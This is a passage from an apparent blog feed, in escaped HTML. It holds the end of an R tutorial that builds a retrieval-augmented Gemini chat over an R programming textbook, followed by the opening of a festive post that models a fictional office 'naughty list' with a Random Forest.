&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2 × 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; start end context text &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; * &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 1 1572 &amp;#34;&amp;#34; &amp;#34;# Efficient R programmin…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 597 2223 &amp;#34;# Welcome to Efficient R Programming&amp;#34; &amp;#34;## Authors\n\n[Colin Gil…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The chunks are stored in a tibble format, with one row per chunk. The
&lt;code&gt;text&lt;/code&gt; column stores the chunk text (in the interests of saving space we
have only included the start of each chunk in the printed output above).&lt;/p&gt;
&lt;p&gt;The title page has been split into two chunks and we can see that there
is significant overlap (chunk 1 spans characters 1 to 1572 and chunk 2
spans characters 597 to 2223). Overlapping chunks are perfectly normal
and provides added context as to where each chunk sits relative to the
other chunks.&lt;/p&gt;
&lt;p&gt;Note that you can visually inspect the chunks by running
&lt;code&gt;ragnar_chunks_view(chunks)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It’s time to build our knowledge store with a vector embedding that is
appropriate for Google Gemini models.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Initialise a knowledge store with the Google Gemini embedding&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;store &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_create&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; embed &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;embed_google_gemini&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Insert the Markdown chunks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_insert&lt;/span&gt;(store, chunks)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The Markdown chunks are automatically converted into a vector
representation at the insertion step. It is important to use the
appropriate vector embedding when we create the store. A knowledge store
created using an OpenAI embedding will not be compatible with Google
Gemini models!&lt;/p&gt;
&lt;p&gt;Before we can retrieve information from our store, we must create a
store index.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_build_index&lt;/span&gt;(store)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can now test the retrieval capabilities of our knowledge store using
the &lt;code&gt;ragnar_retreive()&lt;/code&gt; function. For example, to retrieve any chunks
relevant to the text &lt;strong&gt;Who are the authors of “Efficient R
Programming”?&lt;/strong&gt; we can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_retrieve&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; store,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Who are the authors of \&amp;#34;Efficient R Programming\&amp;#34;?&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 1 × 9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; origin doc_id chunk_id start end cosine_distance bm25 context text &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;lis&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 https://csgi… 1 &amp;lt;int&amp;gt; 1 2223 &amp;lt;dbl [2]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;&amp;#34; &amp;#34;# E…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that the &lt;code&gt;\&lt;/code&gt; operators in &lt;code&gt;\&amp;quot;Efficient R Programming\&amp;quot;&lt;/code&gt; have been
used to print raw double quotes in the character string.&lt;/p&gt;
&lt;p&gt;Without going into too much detail, the &lt;code&gt;cosine_distance&lt;/code&gt; and &lt;code&gt;bm25&lt;/code&gt;
columns in the returned tibble provide information relating to the
matching algorithm used to identify the chunks. The other columns relate
to the location and content of the chunks.&lt;/p&gt;
&lt;p&gt;From the output tibble we see that the full content of the title page
(characters 1 to 2223) has been returned. This is because the original
two chunks both contained information about the authors.&lt;/p&gt;
&lt;p&gt;Let’s add a more technical chapter from the textbook to the knowledge
store. The URL provided below links to &lt;a href="https://csgillespie.github.io/efficientR/performance.html" rel="external"&gt;Chapter 7 (“Efficient
Optimisation”)&lt;/a&gt;.
Let’s add this to the knowledge store and rebuild the index.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://csgillespie.github.io/efficientR/performance.html&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Extract Markdown content and split into chunks&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chunks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_as_markdown&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;markdown_chunk&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Add the chunks to the knowledge store&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_insert&lt;/span&gt;(store, chunks)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Rebuild the store index&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_store_build_index&lt;/span&gt;(store)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now that our knowledge store includes content from both the title page
and Chapter 7, let’s ask something more technical, like &lt;strong&gt;What are some
good practices for parallel computing in R?&lt;/strong&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_retrieve&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; store,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;What are some good practices for parallel computing in R?&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;relevant_knowledge
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 4 × 9&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; origin doc_id chunk_id start end cosine_distance bm25 context text &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;list&amp;gt; &amp;lt;lis&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 https://csgi… 1 &amp;lt;int&amp;gt; 1 2223 &amp;lt;dbl [2]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;&amp;#34; &amp;#34;# E…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 https://csgi… 2 &amp;lt;int&amp;gt; 1 1536 &amp;lt;dbl [1]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;&amp;#34; &amp;#34;# 7…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 https://csgi… 2 &amp;lt;int&amp;gt; 22541 23995 &amp;lt;dbl [1]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;# 7 E… &amp;#34;## …&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 https://csgi… 2 &amp;lt;int&amp;gt; 23996 26449 &amp;lt;dbl [2]&amp;gt; &amp;lt;dbl&amp;gt; &amp;#34;# 7 E… &amp;#34;The…&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Four chunks have been returned:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;One chunk from the title page of the textbook.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;One chunk from the start of Chapter 7.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Two chunks from &lt;a href="https://csgillespie.github.io/efficientR/performance.html#performance-parallel" rel="external"&gt;Section 7.5 (“Parallel
Computing”)&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It makes sense that we have chunks from Section 7.5, which appears to be
highly relevant to the question. By including the title page and the
start of Chapter 7, the LLM will also have access to useful metadata
in case the user wants to find out where the model is getting its
information from.&lt;/p&gt;
&lt;p&gt;Now that we have built and tested our retrieval tool, it’s time to
connect it up to a Gemini interface using {ellmer}. The code below will
create a &lt;code&gt;chat&lt;/code&gt; object allowing us to send user prompts to Gemini.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chat &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ellmer&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat_google_gemini&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; system_prompt &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;You answer in approximately 10 words or less.&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A system prompt has been included here to ensure a succinct response
from the model API.&lt;/p&gt;
&lt;p&gt;We can register this chat interface with our retrieval tool.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_register_tool_retrieve&lt;/span&gt;(chat, store)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To check if our RAG workflow has been set up correctly, let’s chat with
the model.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chat&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;What are some good practices for parallel computing in R?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Use the `parallel` package, ensure you stop clusters with `stopCluster()` (or &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; `on.exit()`), and utilize `parLapply()`, `parApply()`, or `parSapply()`.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output looks plausible. Just to make sure, let’s check where the
model found out this information.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;chat&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;chat&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Where did you get that answer from?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; I retrieved the information from &amp;#34;Efficient R programming&amp;#34; by Colin Gillespie &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; and Robin Lovelace.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Success! The LLM has identified the name of the textbook and if we
wanted to we could even ask about the specific chapter. A user
interacting with our model interface could now search online for this
textbook to fact-check the responses.&lt;/p&gt;
&lt;p&gt;In the example workflow above, we manually selected a couple of chapters
from the textbook to include in our knowledge store. It’s worth noting
that you can also use the &lt;code&gt;ragnar_find_links(url)&lt;/code&gt; function to retrieve
a list of links from a given webpage.&lt;/p&gt;
&lt;p&gt;Doing so for the title page will provide the links to all chapters.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ragnar_find_links&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://csgillespie.github.io/efficientR/&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [1] &amp;#34;https://csgillespie.github.io/efficientR/&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [2] &amp;#34;https://csgillespie.github.io/efficientR/building-the-book-from-source.html&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [3] &amp;#34;https://csgillespie.github.io/efficientR/collaboration.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [4] &amp;#34;https://csgillespie.github.io/efficientR/data-carpentry.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [5] &amp;#34;https://csgillespie.github.io/efficientR/hardware.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [6] &amp;#34;https://csgillespie.github.io/efficientR/index.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [7] &amp;#34;https://csgillespie.github.io/efficientR/input-output.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [8] &amp;#34;https://csgillespie.github.io/efficientR/introduction.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [9] &amp;#34;https://csgillespie.github.io/efficientR/learning.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [10] &amp;#34;https://csgillespie.github.io/efficientR/performance.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [11] &amp;#34;https://csgillespie.github.io/efficientR/preface.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [12] &amp;#34;https://csgillespie.github.io/efficientR/programming.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [13] &amp;#34;https://csgillespie.github.io/efficientR/references.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [14] &amp;#34;https://csgillespie.github.io/efficientR/set-up.html&amp;#34; &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; [15] &amp;#34;https://csgillespie.github.io/efficientR/workflow.html&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You could then iterate through these links, extracting the contents from
each webpage and inserting these into your RAG knowledge store. Just
note, however, that including additional information in your store will
likely increase the amount of text being sent to the model, which could
raise costs. You should therefore think about what information is
actually relevant for your LLM application.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;In summary, we have introduced the concept of retrieval-augmented
generation for LLM-powered workflows and built an example workflow in R
using open source packages.&lt;/p&gt;
&lt;p&gt;Before finishing, we are excited to announce that our new course
“LLM-Driven Applications with R &amp;amp; Python” has just been added to our
training portfolio. You can search for it
&lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you’re interested in practical AI-driven workflows, we would love to
see you at our upcoming &lt;a href="https://ai-in-production.jumpingrivers.com/" rel="external"&gt;AI In Production
2026&lt;/a&gt; conference which is
running from 4-5 June in Newcastle-Upon-Tyne. If you would like to
present a talk or workshop, please submit your abstracts before the
deadline on &lt;strong&gt;23 January&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/retrieval-augmented-generation-database-workflow-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Machine Learning Powered Naughty List: A Festive Jumping Rivers Story</title><link>https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/</link><pubDate>Thu, 18 Dec 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/christmas-machine-learning-naughty-list/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Ho ho ho! 🎅 The holiday season is here, and at Jumping Rivers, we’re
decking the halls with data, not just tinsel. While elves are busy
checking their lists twice, we thought: why not bring a little &lt;strong&gt;machine
learning magic&lt;/strong&gt; to Christmas? After all, what’s more festive than
combining predictive modeling with candy canes, cookies, and a sprinkle
of office mischief?&lt;/p&gt;
&lt;p&gt;This blog is your all-access pass to a code-powered journey where we
find out who’s been naughty, who’s nice, and who’s just mischievously
hovering in between.&lt;/p&gt;
&lt;p&gt;We’ll walk you through the process step by step: gathering the team
data, inventing the most festive features, training our ML model, and
revealing the results with a cheeky, holiday twist. So grab a mug of
cocoa, put on your favorite Christmas socks, and let’s dive into the
Jumping Rivers ML-Powered Naughty List adventure!&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: All data, labels, and results in this post are entirely
fictional and randomly generated for festive fun.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3 id="step-1-data-collection-and-team-introduction"&gt;Step 1: Data Collection and Team Introduction&lt;/h3&gt;
&lt;p&gt;Our first step was gathering our dataset. We used the Jumping Rivers
team as the participants, assigning playful, holiday-themed features to
reflect their potential ‘naughty’ traits. Here’s a concise, festive
overview in a side-by-side table format:&lt;/p&gt;
&lt;iframe width="100%" height="500" src="https://www.jumpingrivers.com/misc/shiny-reactable/html_files/christmas_table.html" alt="reactable table showing JR staff members and their roles" frameBorder="0"&gt;&lt;/iframe&gt;
&lt;p&gt;Each participant is assigned four playful features that represent
holiday mischief:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ate too many cookies 🍪&lt;/li&gt;
&lt;li&gt;Forgot to send Christmas cards 💌&lt;/li&gt;
&lt;li&gt;Sang off-key during carols 🎶&lt;/li&gt;
&lt;li&gt;Gift wrapping disasters 🎁&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Every name on this list is now in the running for the ultimate festive
title: Naughty, Nice, or Mildly Mischievous. Rumor has it that Santa’s
Intern Elf already claimed the top spot for cookie mischief, while
Rudolph keeps dashboards squeaky clean, and Frosty the Snow Analyst is
maintaining a perfectly balanced winter score.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-christmas-naughty-list"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="step-2-feature-engineering"&gt;Step 2: Feature Engineering&lt;/h2&gt;
&lt;p&gt;For ML purposes, names were encoded numerically. This is not meaningful
in a real-world ML context but serves as a demonstration of
preprocessing. The features for modeling include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Name (encoded)&lt;/li&gt;
&lt;li&gt;Ate too many cookies&lt;/li&gt;
&lt;li&gt;Forgot to send Christmas cards&lt;/li&gt;
&lt;li&gt;Sang off-key&lt;/li&gt;
&lt;li&gt;Gift wrapping disasters&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="step-3-model-training"&gt;Step 3: Model Training&lt;/h2&gt;
&lt;p&gt;We chose a Random Forest classifier in R for its simplicity and
interpretability. The model was trained on the dataset to predict the
‘naughty’ label based on the four behavioral features and the encoded
name. Although the dataset is small and playful, this demonstrates a
proper ML workflow: data collection, preprocessing, model training,
prediction.&lt;/p&gt;
